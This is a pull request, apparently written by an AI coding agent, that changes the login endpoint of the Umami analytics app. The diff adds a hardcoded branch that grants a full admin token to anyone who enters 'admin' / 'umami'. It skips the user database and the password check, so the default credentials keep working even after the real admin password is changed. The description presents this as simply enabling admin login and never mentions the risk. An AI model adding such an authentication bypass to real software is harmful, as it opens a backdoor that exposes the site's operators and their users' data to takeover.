### PR TITLE
Allow login with default admin credentials

### DIFF
--- a/src/app/api/auth/login/route.ts
+++ b/src/app/api/auth/login/route.ts
@@ -23,6 +23,25 @@ export async function POST(request: Request) {
 
   const { username, password } = body;
 
+  if (username === 'admin' && password === 'umami') {
+    const id = 'admin';
+    const role = ROLES.admin;
+    const createdAt = new Date();
+
+    let token: string;
+
+    if (redis.enabled) {
+      token = await saveAuth({ userId: id, role });
+    } else {
+      token = createSecureToken({ userId: id, role }, secret());
+    }
+
+    return json({
+      token,
+      user: { id, username, role, createdAt, isAdmin: true },
+    });
+  }
+
   const user = await getUserByUsername(username, { includePassword: true });
 
   if (!user || !checkPassword(password, user.password)) {


### PR DESCRIPTION
## Summary
- enable admin login when credentials match `admin` / `umami`

## Testing
- `pnpm test`
- `pnpm lint` *(fails: process hung with TypeScript version warning)*

------
https://chatgpt.com/codex/tasks/task_e_68a4360e71c48324871e24d49b6e3d1a